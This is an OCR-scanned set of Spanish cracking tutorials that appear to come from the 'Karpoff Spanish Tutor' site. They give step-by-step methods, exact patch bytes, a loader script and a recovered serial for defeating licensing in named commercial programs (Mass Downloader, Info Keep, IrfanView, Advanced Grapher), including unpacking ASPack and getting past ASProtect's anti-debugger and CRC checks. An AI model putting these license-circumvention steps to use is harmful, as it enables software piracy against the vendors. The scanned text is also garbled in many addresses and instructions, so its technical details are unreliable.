avisara de k nuestro keyfile no es el correcto "invalid key file dude... are you trying to trick me?" buenos es el último 
punto k nos falta, ahora miremos en nuestro listado muerto y veremos una string donde dice: "good job....” umm 
interesting, vemos k a esta linea se accede desde un salto proveniente de 401528, si os fijais en esa porcion de código y 
traceamos un poco veremos k está comprobando 2c bytes empujados a ecx (es decir, 44 bytes) de nuestro estro keyfile 
con la porción de código k lo valida indicada por esi, pues tan solo nos falta fijarnos dnd se encuentra ese bloke y copiar 
los primeros 44 bytes con un heditor hexadecimal a nuestro crackme y ya está!!!. crackme resuelto :) 


resultado: 


«+ crackme.lic 
3D 3D 44 3D 3D DD BC E2 DD BD E2 EE E2 
C2 DC EE E2 BB E2 3D 3D 5A 3D 3D DD BC E2 
DD BD E2 EE E2 C2 DC EE E2 BB E2 3D 3D 41 


happy cracking. 


saludos para toda la peña del canal +tcrackers del hispano. 
para cualkier apreciación: herobitmixmail.com 
nopper. 
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Programa: Mass Downloader 2.0.137 

PROTECCION: Serial y Limitacion de Tiempo 

Objetivo: Simular estar registrados 

Descripcion: Acelerador de downloads 

Dificultad: Media 

DOWNLOAD : http: //www.metaproducts.com 

Nasa nalaeaas SoftIce v4.05, W32dasm v8.93, UltraEdit v7.1l0a, UN-PACK vl.9, 
ProcDump32 v.1.6.2 FINAL 

CRACKER: Crick FECHA: 02/11/2000 

INTRODUCCION 


Hola a todOs. Este es el primer trabajo de 'reversing' ;) que publico. Espero que os sirva. 

El programita en cuestión es el Mass Downloader 2.0.137 que sustituye a la versión 1.2.95 (si no me 
equivoco). Es un buen acelerador de 'downloads' ya que el fichero que nos vamos a bajar lo parte en varios 
trozos y se baja cada trozo simultáneamente!!! 

Bueno, al grano. Es un ejecutable empaquetado con el nuevo ASPACK 2.11 (mr. nobody: te aseguro que no 
da tanto miedo). Después de intentar encontrar un n” de serie válido sin conseguirlo :'( decidí atacar al 
tradicional método del CALL xxx; TEST AL,AL; JNZ yyy con éxito :) 


al atake 


en primer lugar tenía que averiguar algo sobre el ejecutable, así que lo pasé por el un-pack v1.9 que me dijo, entre 
otras cosas, esto: 


* file size 533504 bytes 

* time/date stamp.......: $2a425e19 

* entry point rva.......: $00186001 

* base of code..........: $00001000 

* base of data..........: $0012d000 

* image base............: $00400000 

* entry point...........: $0007£401 ($00586001) at section n9 <<<-- la puerta de entrada 
* packed by aspack v.2.11 by alexey solodovnikov <<<-- la zancadilla 

* unpacker not available <<<-- la putada !!! 


bueno, no pasa nada. si no lo podemos desempaquetar a máquina, 
lo haremos a mano xd 


pero primero hay que modificar la información de la cabecera del ejecutable. ¿por qué?, pues porque, como casi todos, 
los empaquetadores modifican esta cabecera para hacer el código indesensamblable (%iquestse dice así?, pues vaya...). 
ejecutamos procdump32 v.1.6.2 y pinchando en pe editor buscamos el ejecutable (massdown.exe), una vez abierto 
nos vamos a sections, buscamos la sección .aspack y cambiamos las caracteríticas de cOD00040 a e0000020. con esto 
decimos que es una sección que contiene código y que es ejecutable. 

salimos con ok del procdump32. 

cargamos el symbol loader y abrimos nuestro massdown.exe, le damos a load, y estamos en softice !! 


014f:00586001 pushad <<<-- estamos aquí. instrucción típica de empaquetadores 
014f:00586002 jmp 00586444 


estamos al principio de la rutina de desempaquetado del aspack 2.11, ahora sólo (¿¡sólo!?) queda seguirla y parar justo 
antes de que devuelva el control al programa principal. os ahorraré el trabajo: 

seguimos con £10 hasta el primer call (sin ejecutarlo) 

en este call hay que entrar con f8, si no el programa se nos escapa... 

014f:00586444 and ebx,1cc3e907 

014f:0058644a mov esi,ad/36873 

014f:0058644f call 00586470 <<<-- en este hay que entrar 


entramos y seguimos con f10 

f:00586470 pop edx 

:00586471 adc ebp, O0fed1143 
:00586477 movsx ebp,si 
:0058647a mov di,dx 

:0058647d add edx,ee2bf152 <<<-= ¡qué cosas más raras! 
:00586483 movsx edi,si 
:00586486 mov ecx,513b3f29 
:0058648b mov bp, si 

:0058648e movsx ebp,bp 
:00586491 add ebp,1df4aba9 
:00586497 mov ebp,11d40e99 
:0058649c add bl, 63 

:0058649f add byte ptr [ebptedx],01 
:005864a3 inc ecx 

:005864a4 xor bl1,61 

:005864a7 mov bx,si 

:005864aa sub edx, 00000001 
:005864b0 mov ebx,ecx 

:005864b2 3Jmp 005864d3 (jump .) 
:005864d3 cmp ebx, 513b4362 
:005864d9 jnz 0058648e (Jump .) 


aquí usaremos un breakpoint para evitar el bucle, es decir: 

bpx 5864df y f5 

break due to bpx +014f:005864df (et=2.02 milliseconds) 
014f:005864df movsx esi,ax <<<-== seguimos con f10 :) 
:005864e2 jmp 00586503 (jump .) 

:00586503 3jmp 0058643b (jump .) 

:0058643b jmp 00586007 (jump .) qué manera de marear al personal 
:00586007 call 00586430 

:0058600c jmp 0058600e (jump .) 

:0058600e mov ebx, 00443930 

:00586013 add ebx, ebp 
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014f:00586015 sub ebx, [ebp+00443fd0] 

014f:0058601b cmp dword ptr [ebp+004449fc],00 

014f:00586022 mov [ebp+004449fc],ebx 

014f£:00586028 jnz 00586394 <<<-- este es el fundamental (no jump) 

ebx llega aquí con el valor 400000, probablemente la primera dirección para desempaquetar la primera 
instrucción (a los que les guste parchear al vuelo, éste puede ser un punto de partida). nos saltamos de un 
plumazo toda la rutina de desempaquetado (que, por cierto, no tiene desperdío). 

metemos un breakpoint en 586394 y f5 

:bpx 586394 

break due to bpx +$014f£:00586394 (et=296.78 milliseconds) 

014f£:00586394 mov eax, [ebp+004439ad] <<<-- aterrizaje perfecto 

014f£:0058639a push eax <<<-- seguimos con f10 

014f£:0058639%b add eax, [ebp+004449fc] 

014f:005863a1 pop ecx 

014f£:005863a2 or ecx,ecx 

014f£:005863a4 mov [ebp+00443ce6],eax 

014f£:005863aa popad <<<-- instrucción complementaria al pushad inicial 
014£:005863ab jnz 005863b5 (jump .) 

014f£:005863b5 push 0052bd3c <<<-- nuestro buscado oep 

014f:005863ba ret <<<-- nos paramos aquí sin ejecutar el ret 

el valor metido en la pila es el punto de entrada del programa original. tenemos el programa desempaquetado 
en memoria!!!. 

introducimos en la línea de comandos de softice lo siguiente: 

a eip <intro> 

jmp eip <intro> 

<intro> 

nos debe haber quedado algo así: 

014f£:00586394 mov eax, [ebp+004439ad] 

014f£:0058639a push eax 

014f£:0058639%b add eax, [ebp+004449fc] 

014f£:005863a1 pop ecx 

014f£:005863a2 or ecx, ecx 

014f£:005863a4 mov [ebp+00443ce6],eax 

014f£:005863aa popad 

014£:005863ab jnz 005863b5 

014f£:005863ad mov eax,00000001 

014£:005863b2 ret 000c 

014£:005863b5 push 0052bd3c 

014f£:005863ba jmp 005863ba <<<-- hemos creado un bucle infinito 

ahora pulsamos f5 y dejamos al programa metido en un bucle infinito. 

arrancamos procdump32 de nuevo y localizamos en la ventana de task a nuestro massdown.exe lo 
seleccionamos con el botón derecho del ratón y, en el menú que aparece, elegimos dump (full). guardamos el 


ejecutable con otro nombre (por ejemplo: mass2.exe) y aún no salimos de procdump. 
¿Qué tenemos? 


tenemos a nuestro massdown.exe con todas sus vergiienzas expuestas a las miradas ajenas, es decir, 
desempaquetado y completo !!!! 

pero falta una cosa. ¿os acordáis de la dirección que se mete en la pila antes del último ret? ''52bd3c'' ese debe 
ser ahora nuestro punto de entrada al programa, por lo tanto pulsamos en pe editor (dentro de procdump) y 
buscamos ahora nuestro exe recien desempaquetadito. en entry point metemos la dirección 12bd3c (52bd3c- 
400000). pulsamos en sections y cambiamos el campo características de la sección .code de c0000040 a e0000020, 
por la misma razón que antes. (también podemos dejar la sección .aspack como estaba (con el c0000040). 

ahora sí, salimos de procdump. 


volvemos a softice con ctrl + d y restauramos el ret 
:a eip<intro> 

014f:005863bka ret<intro> 
014f£:005863bb<intro> 


f5 y dejamos que se cargue el programa. después salimos de él. 


tenemos el massdown.exe original y nuestro mass2.exe desempaquetado. los renombramos. a massdown.exe le 
llamamos massdown.exe.original y a mass2.exe lo llamamos massdown.exe (que nadie se pierda :) 

bien, y ¿ahora qué?. 

bueno, a mí se me ocurrió ir a la caza de un n” de serie válido, por lo que me fuí directo al menú about y a 


continuación a register. 

metí un nombre de usuario y un n” de serie (o de licencia) y... 

ctrl+d para ir a softice. después de probar algunos bpx me funcionó este: 

bpx hmemcpy. f5 para volver a mass downloader y pulsamos en ok para que se 'valide' nuestro usuario y n* de 
serie :) 

softice nos saluda... estamos dentro. 

pulsamos f12 7 veces (sí 7) 

ahora estamos en el código de mass downloader. 

pulsamos f12 5 veces más. 

debemos andar por aquí: 


:004ec2ad 8d55fc lea edx, dword ptr [ebp-04] 

:004ec2b0 8b83ec020000 mov eax, dword ptr [ebx+000002ec] 

:004ec2b6 e82dc4f4ff call 004386e8 <<<-- aquí se lee el usuario 

:004ec2bb 8d55f8 lea edx, dword ptr [ebp-08] <<<-- habremos aterrizado por aquí 
:004ec2be 8b83f£4020000 mov eax, dword ptr [ebx+000002f£4] 

:004ec2c4 e81fc4f4ff call 004386e8 <<<-- aquí se lee el n” de serie 
:004ec2c9 8d4df8 lea ecx, dword ptr [ebp-08] 

:004ec2cc 8d55fc lea edx, dword ptr [ebp-04] 

:004ec2cf al50015300 mov eax, dword ptr [00530150] 

:004ec2d4 8b00 mov eax, dword ptr [eax] 

:004ec2d6 e8c9920100 call 005055a4 <<<-—- esta es la madre del cordero !!! 
:004ec2db 84c0 test al, al 

:004ec2dd 747e je 004ec35d 

:004ec2df al50015300 mov eax, dword ptr [00530150] 


si a alguien le interesa el call 00505544 es la validación de nuestro n” de serie 

yo me cansé de intentar cazar el n” bueno :( 

pero la rutina es interesante, primero se comprueba que el usuario introducido no sea alguno de los que el 
programa tiene fichados !!! (¿eh, mr. green?). después calcula el mismo n” de serie que era válido para la 
versión anterior del programa (¿aprovechando código, eh...?, je, je) y luego lo marea de una forma que 
consiguió marearme a mí. 

pero, si nos fijamos, a la vuelta del call hay una comprobación que nos suena: test al,al 

¿no será...? lo es !!!! 

vale ya está claro, ¡¡invertimos el salto!! 

no vale. eax debe valer 01. 

entonces, ¿¿solo tenemos los 2 bytes del test al,al para hacer algo...??? 

n0000... podemos ver donde consigue eax ese valor y 'ayudarle' xd 


entramos en el call 00505544... 

* referenced by a call at addresses: 

| :004ec2d46 , :004£5a36 

| 

:005055a4 55 push ebp <<<-- por aquí, por favor... :) 
:005055a5 8bec mov ebp, esp 

:005055a7 6a00 push 00000000 

:005055a9 6a00 push 00000000 

:005055ab 6a00 push 00000000 

:005055ad 6a00 push 00000000 

:005055af£ 53 push ebx 

:005055b0 56 push esi 

seguimos trazando hasta: 

:00505b58 ebeb jmp 00505b45 

:00505b5a 8a45ff mov al, byte ptr [ebp-01] <<<-- paramos aquí 
:00505b5d 5e pop esi 

:00505b5e 5b pop ebx 

:00505b5f 8be5 mov esp, ebp 

:00505b61 5d pop ebp 

:00505b62 c3 ret 


casualmente el ret que hay en 505b62 nos devuelve a nuestro test al,al 

osea que nuestro 01 deberí habitar en [ebp-01] (pero noes así. hay un cero patatero) 
pues lo cambiamos... 

en lugar de: mov al, byte ptr [ebp-01] 

metemos un flamante: mov al,01 

para ello anotamos los bytes que nos interesan: ebeb8a45ff5e5b 


los buscamos con nuestro editor hexadecimal (ultraedit 7.10a) 

y los cambiamos por: ebebb001905e5b (sólo hemos cambiado 3 bytes) 

grabamos y probamos.... 

el programa arranca... vamos a about... a register y.... 

not registered !! 

pero..., pero..., tú dijiste... :'( 

tranquilos, meted los datos que querais y pulsad ok. 

¿Qué ha pasado?... estamos registrados !!!! 

la explicación al primer susto está un poco más arriba, concretamente cuando entramos en el call el w32dsm89 
nos dice que a esa rutina se le llama desde 2 sitios, uno el que hemos visto y el otro nada más ejecutar el 
programa se comprueba si el reguser y regkey (son claves del registro, bajo 
hkculsoftwarelmetaproductsimassdownloader) son buenos, y la primera vez no existían en el registro. se crean 
cuando nos 'registramos' por primera vez. 


ahora podemos observar que al haber modificado el valor de al antes de volver de la rutina de comprobación 
conseguimos que el parche funcione aunque se llame a la rutina desde diferentes puntos. 


desde este momento, cada vez que arranquemos el programa nos dirá que estamos perfectamente registrados. 


un saludo. 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 


A W32dasm, Editor Hexadecimal, File inspector, procdump y 
Herramientas: 
parcheador 


introduccion 


es un programa que vemos que esta comprimido al pasarlo por el 'file inspector". 


8, -= file insPEctor v3.0 - By ViPER [ K-FOR ] - Released 23/10/00 =- 


Datos PE Secciones | Importaciones/Exportaciones a ; Herramientas | Acerca de... | 


Reconocimiento de signaturas 


Compilador: Neolite 2.0 
Signatura; 


Wersión de la DLL: hi «D Información, .. $ Asociar EXE *s 


Versión del enlazador; [6.0 Versión de la imagen; n 0 
Versión del 50; fa.o Versión del subsistema; fa.o 


63 Abrir archivo... Ey Analizar 


[C:COMUNICAMNFOKE”14INFOKE"1.EXE 


empezaremos descomprimiendolo con el procdump. lanzamos el procdump, 'clickeamos' en unpack y elegimos el 
compresor neolite2 ... 


una vez descomprimido y guardado el archivo descomprimido (a partir de ahora infodes) vemos que ocupa bastane 
mas espacio que el archivo original, pero sigue funcionando igual. 


el siguiente paso es proceder a desensamblarlo para poder ver las 'strref'. pero al intentarlo no hay ' referencias' y el 
desensamblado ha sido muy rapido, por lo que debe de tener alguna proteccion anti-dasm. 


para quitarla volvemos a acudir al procdump. 'clickeamos' en pe editor y elegimos el fichero infodes y vemos: 


PE Structure Editor 


¡Header Infos + Structures Editor 1 OK | 
Entry Point: [000061 90 | Sections | Directory | 
Size ofimage- [00147000 - Apply changes method: 


1% Only to PE header 
Image Base: [00400000 C TOPE file 


Cancel | 


'click' en sections y vemos: 


Sections Editor 


Sections Informations; 


Name | VitualSize | VitualDiteet 


text D018CFB6 00001000 D018CFB6 00001000 Coo000080 
¿data 00010340 0018000 00000000 0018E000 Co0000040 
.Iste DODOO0AFO 0019F000 O0000AFO 0018E000 40000040 
¿heolit DODO609C 00140000 00004610 0018F000 E0000020 


le damos con el boton derecho del raton a '.text' y nos saldra un menu en el que elegimos 'edit section', ahora 
cambiamos 'c0000080' por 'e0000020'. aceptamos todo dando en 'ok' y salimos del procdump que ya hemos terminado 
con el. 


ahora desensamblamos infodes y vemos que tarda bastante mas que antes y al terminar vemos que hay 'strnref”. 


en las 'strnref' buscamos 'unregistered user', hacemos 'doble-clic' sobre el y aparecemos aqui: 


O04EC5F7 OFBFISECFEFFFF movsx edx, word ptr lebp+FFFFFEBC] 
OO4ECS5FE 85D2 test edx, edx 

DO4EC6DO 7444 je DO4EC646 

:D04EC60Z C745FE24000000 mov [ebp-04], 00000024 
:D04EC609 66C7O5CEF958000000 mov word ptr [0058F9C6], 0000 
:004EC612 C745FC25000000 mov [ebp-04], 00000025 


» Possible Stringlata Pef from Code 0b3 ->"Unregistered User" 
/ 


:OD4EC61E 6826F95800 push 0058F926 
:004EC623 6AS0 push 00000050 


un poco mas arriba, en la direccion '4ecó600' vemos un salto que no se produce mientra no estamos registrados. vamos a 
forzarlo convirtiendolo en salto incondicional: 


7444 je 004e646 por eb44 ¡mp 004e646 


este cambio lo hacemos con el editor hexadecimal. damos a 'ctrl-g' y escribimos el offset obtenido con el dasm ('ec600' 
en mi caso) y realizamos el cambio en el archivo 'infodes'. 


si ahora lo ejecutamos parece que no estamos registrados, pero en help-registration ves que estas registrado con el 
nombre de 'unregistered user' y ya no existe limite de tiempo ni nada y solo hemos cambiado ¡¡¡un byte!!!. 


por último vamos a parchear el programa en memoria. para ello yo utilicé el programa risc patcher 1.4. su 
funcionamiento es muy sencillo: 


19) se crea, con un editor de textos, un archivo que contenga estas lineas y se graba con la extension rpp (info.rpp, por 
ejemplo). 


¡info Keep 1.30 

¡t=1000: ¡try 1000 times to patch the memory 
f=info Keep.exe: ¡program to load/patch 
p=4ec600/74/eb:;change aje xx toajmp xx 


$ ¡end of script 


2%) se ejecuta el programa rpp.exe y se elige el prorama anterior (info.rpp). se creará un archivo loader.exe que cada 
vez que lo ejecutemos parcheara info keep.exe y hara que funcione como registrado. 


esto es todo. 


saludos atodos  pericogO hotmail.com 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 


Programa: Irfanview 3.30 

PROTECCION: Name / Serial 

Objetivo: Encontrar el registro y arreglarlo 

Descripcion: Visor de muchos formatos gráficos 

Dificultad: Media 

DOWNLOAD : http://stud 1 .tuwien.ac.at/-e9227474/iview330.zip 

Herramientas: File inspector, TRW2000, W32dasm, Procdump, Exescope, Aspack 

CRACKER: perico FECHA: 22/11/2000 
introduccion 


empezaré diciendo que este programa no necesita ser crackeado porque no tiene ninguna limitación lo 
registres o no. no obstante, si sigues queriendo registrarlo bastara con que leas la parte correspondiente a 
encontrar un codigo valido. 


por lo tanto solo es necesario que sigas leyendo si quieres aprender algo sobre los programas que uso para 
crackear. 


las herramientas utilizadas las puedes encontrar en: http://web_karpoff.exit.de y el programa aspack en 
http://www .crackstore.com/ 


al atake 


1”.- desensamblado manual 


empiezo pasando el programa por el file inspector 3.0 para saber si el programa esta comprimido, y me dice que esta 
comprimido con aspack v1.08.04. vamos a descomprimitlo manualmente. 


para ello abrimos el trw2000 (o softice si lo prefieres) 


TRW2000 for Windows 9x E 
Ele Help 


F 


Please input file name : 


[CagraficosUR FANVIEWi_view32.exe 


Message Output : 


Success! 
begin load file 'C¡igraficosURFANVIEWii_: 
Open file "CigraficosURFANVIEW!i_view 


Loading... TR 
Success! 


browse: eliges el fichero -> load -> aterrizamos aquí 


50c001 pushad 

50c002 Call 50c579 -> en este Call debemos entrar con f8, porque 
si no el programa se nos escapa. 

entramos y seguimos con f10. 


50c007 jmp 50c03c 


50c03c mov ebx, 44393e 
50c050 mov [ebp + 444798],ebx -> aquí ebx llega con el valor 
40000 
50c056 jnz 50c4dd (jump) -> aquí pondremos un breakpoint 50c4dd 
para evitar el bucle. 


bpx 50c4dd y £5 


50c4dd mov eax, [ebp + 443a09] -> aterrizamos aquí 


50c4fe push 4alcb3 -> £ep necesario para calcular el nuevo entry point 
50c503 ret -> nos paramos aquí sin ejecutarlo. 
introducimos en la línea de comandos: 


a elp (eip=50cCc503) 
jmp 50c503 <intro> 
<intro> 


ahora pulsamos f5 y dejamos al programa metido en un bucle infinito. 


arrancamos el procdump y localizamos en la ventana de tasks a nuestro 
irfanview. lo seleccionamos con el botón derecho del ratón, elegimos dump 
(full). guardamos el ejecutable con otro nombre (view.exe). 


ahora tenemos que hacer unos retoques para que el archivo descomprimido 
(view.exe), recien creado, funcione: 


1%) le damos a pe editor y elegimos view.exe. Cambiamos el entry point. su 
nuevo valor es el resultado “4alcb3 (el valor oep encontrado antes) menos 40000 
(image base) = alcb3 


2%) le damos a 'sections' y editamos .text (boton derecho del raton). ahora 
cambiamos 'c0000040" por 'e0000020'. este cambio es para poder ver las 
'strnref' en el w32dasm. es una prroteccion anti-dasm. 

3%) ahora vamos a eliminar el programa irfanview que dejamos en la memoria. 
para ello en la ventana de task seleccionamos nuestro irfanview con el boton 
derecho del raton y elegimos 'kill task'. 


4%) cerramos el procdump. 


si ahora ejecutamos el view.exe vemos que funnciona perfectamente. la unica 
diferencia es el tamaño: original -> 388 kb, descomprimido 988kb. 


2%.- encontrar un código válido 
ejecutamos el programa view.exe o i_view.exe (da lo mismo). 


'clic' en help -> registration 


lrfanView - Registration 


introducimos cualquier dato y nos sale una ventana diciendo: 


IrfanView 


ahora abrimos el w32dasm (cargamos el view.exe) y buscamos en las 'strnref' 
esta frase, hacemos doble-clic sobre ella y aparecemos en: 


vemos en :0044db%a un salto que de producirse saltaria a registratio correct!. 
podriamos cambiar este salto con lo que el programa aceptaria cualquier dato 
que introdujeramos. 


esta seria una manera, otra que es la que voy a utilizar es encontrar el codigo 
correcto correspondiente a nuestro nombre. para ello vamos a volver al trw2000, 
cargamos el programa descomprimido y ponemos un breakpoint en el salto. es 
decir, bpx 44db% y f5 para volver al view.exe, ahora le damos a help y 
registration e introducimos nuestros datos. 


al darle a 'ok' el programa rompera en el salto. si ahora ponemos d edx vemos 
en la ventana de datos el codigo correspondiente al nombre que hemos 
introducido. 


si introducimos nuestro nombre (perico) y el codigo obtenido (303770008) vemos 
que el registro es correcto. 


una vez registrado, en el menu help sigue apareciendo la clave registration. 
vamos a eliminarla. 


3%.- últimos retoques 
para ello recurrimos al programa exescope. 


una vez abierto el programa view.exe, nos aparece esto: 


e% eXeScope - C:igraficosWRFANVIEWNdescom.exe 


File Edit Search View Help 


BN 2 ans noLoooma 


Header 
E- Import FiErended Meno T” Checked T” MenuBarBreak: 
E Resource 
Bitmap T” Grayed T Hilite: J” MenuBreak. 
E Menu na 
HEXWINDOW 1” Disabled T Default T Seperator 
 ]RFANVIEW 
-- THUMBNAILS E 2 D; 
Dialog . 40205, Start animation 
String 40236, Stop anitemation 
E) Accelerator E 0.Help 
Cursor --40188,4Help$09F1 
Icon 40219 Installed ¿Plugins 


E- Version 0, 
Toolbar --40146,4Thanks... 


: -- 40220 4Credits... 
ius (), 
-40073,.4Registration 
o ), 
: -- 40005, ¿nto 

-- 40036 44 bout IrfanView$094 


Ofiset=000EF508, Size=1584 


abrimos, como vemos, resource-menu-irfanview, y en la parte derecha vemos una 
serie de claves, buscamos help y ahi esta nuestra clave registration, pulsamos 
con el boton derecho del raton y elegimos 'delete'. tambien eliminamos uno de 
los '0' que corresponde a la linea. 


salimos del exescope y nos sale esta ventana 


a la que respondemos que 'ok', para guardar los cambios. 
4%. final 
con esto tenemos el programa registrado y no nos aparecen recuerdos molestos. 


lo único que nos queda por hacer es cambiar el original i_view.exe por el 
view.exe. 


tambien podemos volver a comprimirlo con cualquier compresor. yo usé el 
aspack. 


es muy sencillo. lo abrimo, elegimos el programa a comprimir y ya esta. 


pericogOhotmail.com 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 
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Karpoff Spanish Tutor 2001 


Programa: Advanced Grapher 1.61 


PROTECCION: ASPack 1.08.04 + ASProtect. 
Descripcion: Liquidar manualmente la protección. 


Dificultad: Avanzado. 


DOWNLOAD : http://www.serpik.com/agrapher/ 


Herramientas: Softice 3.24, FrogsICE, Procdump32, FileinsPEctor 3.5, un Editor Hexadecimal. 


Arkanian 09/01/2001 


introduccion 


"audaces fortuna juvat" 
que traducido (muy) libremente quiere decir: 
"este jodido programa no va poder conmigo"' 


la verdad es que no pensaba meterme en semejante follón cuando empecé con este programa pero la 
curiosidad pudo más que yo. veremos como derrotar manualmente este tipo de protecciones y para ello 
seguiremos la serie de pasos que detallo a continuación: 


liquidar manualmente las rutinas antidebugger. 

saltar por encima del chequeo crc-32. 

hallar el punto de entrada original (oep) y volcar el programa. 
conseguir una tabla de importaciónes "limpia". 

reconstruir el ejecutable obtenido. 

después de todo esto y para finalizar, ¿que nos queda? 


antes de empezar una pequeña recomendación, ¡cuidado al instalar el programa!. antes de finalizar la 
instalación se produce una comprobación de la presencia de sotfice, por ello te recomiendo que, o bien no 
tengas activo softice o bien que hagas la instalación, si lo tienes activado, con frogsice funcionando con la 
opción bulletproof activada. si el programa de instalación detecta softice aparecerá la consabida ventanita de 
debugger detected y si lo instalas con frogsice funcionando con la opcion default settings saltará softice con 
un mensaje de error y el programa no se instalará correctamente. 


ahora si, dicho esto, vamos alla... 


contacto con el enemigo 


una vez instalado el programa utilizamos fileinspector para analizarlo, la pestaña compilador nos devuelve un 
aspack1.08.04 + asprotect, ya sabemos a que nos enfrentamos. echemos un vistazo a las secciones, todas a cO000040, 
estupendo..., ¿tres secciones .data y en una de ellas el entry point?, que curioso, ¿no hay sección .aspr?, parece que la 
cosa se complica. 


ejecutamos agrapher.exe con frogsice activado y la opción bulletproof marcada. ventana de unregistered copy, 
shareware licence, insert register key, etc..., pero esto de momento no nos interesa.vamos a frogsice, concretamente a 
la opción view log y obtenemos esto: 


=> agrapher 
** softice detection ** code 0b, at cs:005a1 18b 
attempting to load: siwdebug (string ref at cs:005a1160) 


=> agrapher 
** softice detection ** code Ob, at cs:005al 18b 
attempting to load: sice (string ref at cs:005a1154) 


=> agrapher 
** softice detection ** code 0b, at cs:005al 18b 


attempting to load: ntice (string ref at cs:005a1148) 


=> agrapher 

** softice detection ** code 01, at 0177:005a1338 
interrupt:03h >eax=00000004h ebx=005a1750h ecx=0078fdech 
edx=0078fcb4h esi=0056bbe8h edi=0058ebech 


>ebp=4243484bh 


seh proc address at cs:005a134c 


por lo que parece "meltice" seguido de un "boundschecker" con una int3 (ebp=4243484bh, o sea bchk). de momento 
asequible. 


bueno, cerramos agrapher, iniciamos procdump y solo por probar cambiamos las características de cualquier sección a 
e0000020, iniciamos de nuevo el objetivo y aparece una ventana de error con un mensaje de file corrupted. una 
comprobación de integridad de archivo (cre), asequible también. 


primeras escaramuzas 


1.- liquidar manualmente las rutinas antidebugger. 


desactivamos frogsice y hacemos un crtl+d, asignamos las ventanas como siempre y metemos un bpx createfilea, 
volvemos al windows, ejecutamos el programa, softice salta, pulsamos f5 y veremos en la ventana de datos 
correspondiente a eax, la cadena MAsiwdebug, pulsamos f11 para ver de donde venimos y empezamos trazando con f10 
hasta ver tres kernel32!getlasterror seguidos, concretamente este código repetido tres veces: 


call 0059d9bc 

test al, al 

jnz 0059db07 

call kernel32!getlasterror 
cmp eax, 02 

jnz 0059db07 


recuerda que las direcciones en tu ordenador serán diferentes. ahora puedes desactivar el bp mediante bd *, ya que si 
no saltará otra vez en el call 59d9bc, sigue trazando despacio con f10. 


para Wasiwdebug el primer getlasterror devuelve en eax 32, puedes cambiarlo manualmente a 02 (que es lo que el 
programa espera encontrar) o invertir el salto. para Wsice el segundo call 59d9bc devuelve en eax 01, cambialo a 00 o 
invierte el salto, si no el test al, al y el salto posterior nos llevan fuera. con Wantice (¿estas trabajando con windows nt?) 
haz lo mismo. si no dejalo estar. 


personalmente prefiero "nopear” los dos saltos, ya que es posible que el programa vuelva a comprobar, en un momento 
posterior, la presencia de softice así nos curamos en salud. 


habilita el bp de nuevo con be * cuando saltes a un xor eax, eax, sigue despacio con f10 y verás una serie de jmp 
seguidos que van cambiando cuando pasas por encima de ellos. verás poco después como aparece una instrucción del 
tipo mov ebp, 4243484b y un poco más abajo como aparece un mov ax, 0004. aquí tienes dos opciones: 


1. modificar ebp para que el valor sea superior a 0x4243484bh. por ejemplo cambia el 42 por un 52. sigues con 
f10, aparece una int3 y saltas al bp en kernel32!createfilea. 
2. ensamblar la linea mov ax, 0004 a jmp 0, pulsas f5 y aterrizas igualmente en kernel32!createfilea. 


he optado por la segunda opción, no vaya a ser que haya una comprobación posterior. 
de aquí f11 de nuevo y volvemos a estar en el código de asprotect. sigue con £10. 
2.- saltar por encima del chequeo crc-32. 


seguimos con £10 durante un rato, observa los valores que devuelven los call en eax, cuando veas un valor extraño 
(recuerda que has cambiado las características de una sección con procdump), apuntalo, sigue hasta que veas el 
siguiente código: 


mov eax, [ebp-14] --> el valor que has apuntado, 02de855f en mi caso. 
cmp eax, [ebp-10] --> el valor bueno, concretamente 79428769. 
jz 0OS59dcc9 --> cambialo por un jmp. 


bien, ya hemos saltado, sigue con f10. 
inicio de las hostilidades 
3.- hallar el punto de entrada original (oep) y volcar el programa. 


aquí si que no hay estrategia que valga. he probado soluciones que he encontrado en diferentes ensayos sobre asprotect 
y no funcionan. supongo que en cada programa serán diferentes, así que aquí tienes lo que he encontrado yo y mi 
solución para encontrar el punto de entrada real. 


. Sigue con £10 hasta que veas dos jmp's seguidos. parate ahí. 

. desplaza el código hacia abajo con las teclas del cursor hasta que veas un ret 0004. 

. anota la dirección del último call antes del ret 0004 y haz un g [dirección]. 

. entra en ese call con f8. sigue con £10 hasta ver dos call seguidos. 

. entra en el segundo call con f8, verás un ¡mp kernel32!raiseexception. sigue con f10 y salta. 

. de kernel32!raiseexception pasamos a kernel32!findclose sigue con £10 hasta un call [ebp+18]. 
. pulsa f8 y vuelve a asprotect. 

. F10 hasta encontrar, otra vez, dos call seguidos. otra vez al 2* call. la jugada se repite tres veces. 
. Sigue con £10 hasta un setz seguido de dos jmp's. f8 y despacio. observa como cambia el código. 
. debajo de los jmp's aparece un mov eax, [ebp-08]. en eax está el oep.(4e7368). 

. encuentras un popad y poco después aparece un ret. alto ahí. 


== 0v0D0 DA euyn 


Roa 


paramos en el ret y ensamblamos la linea a jmp eip. crtl+d vamos procdump32 y hacemos un volcado completo de 


agrapher.exe. vamos a llamarlo por ejemplo prueba.exe. cambia el entry point (00140001) por el que hemos hallado 
restando la image base (004e7368 - 00400000 = 000e7368). 


si analizamos prueba.exe con fileinspector veremos que la pestaña compilador devuelve borland delphi 3.0 pero la 
tabla de importaciones (pestaña importaciones/exportaciones) parece estar incompleta. todo es aparentemente normal 
menos la rama kernel32.d1l que tiene ahora tres subramas con tres números (0, 397 y 533) mientras que en el programa 
original estas subramas están ocupadas por getmodulehandlea, getprocaddress y loadlibrarya. 


para subsanar esto hay que copiar manualmente, mediante un editor hexadecimal, la sección .data (¿.aspr camuflada?) 
que contiene el entry point de agrapher.exe a nuestro volcado prueba.exe. utilizaremos de nuevo fileinspector para 
volcar la sección ya que procdump32 se muestra ineficaz y devuelve un mensaje de error de lectura/escritura. 


una vez copiada la sección analizamos de nuevo prueba.exe con fileinspector, parece que todo esta correcto y cada 
cosa en su sitio. 


retirada estrategica 


pero no funciona. si ejecutas prueba.exe veras como salta softice en una dirección cbxxxx con código inválido y el 
consiguiente cuelge. aquí, después de muchas pruebas, algunas de ellas autenticas tonterias y visto que la cosa no 
funcionaba, fue necesario documentarse sobre lo que estaba pasando y lo que realmente hace asprotect. 


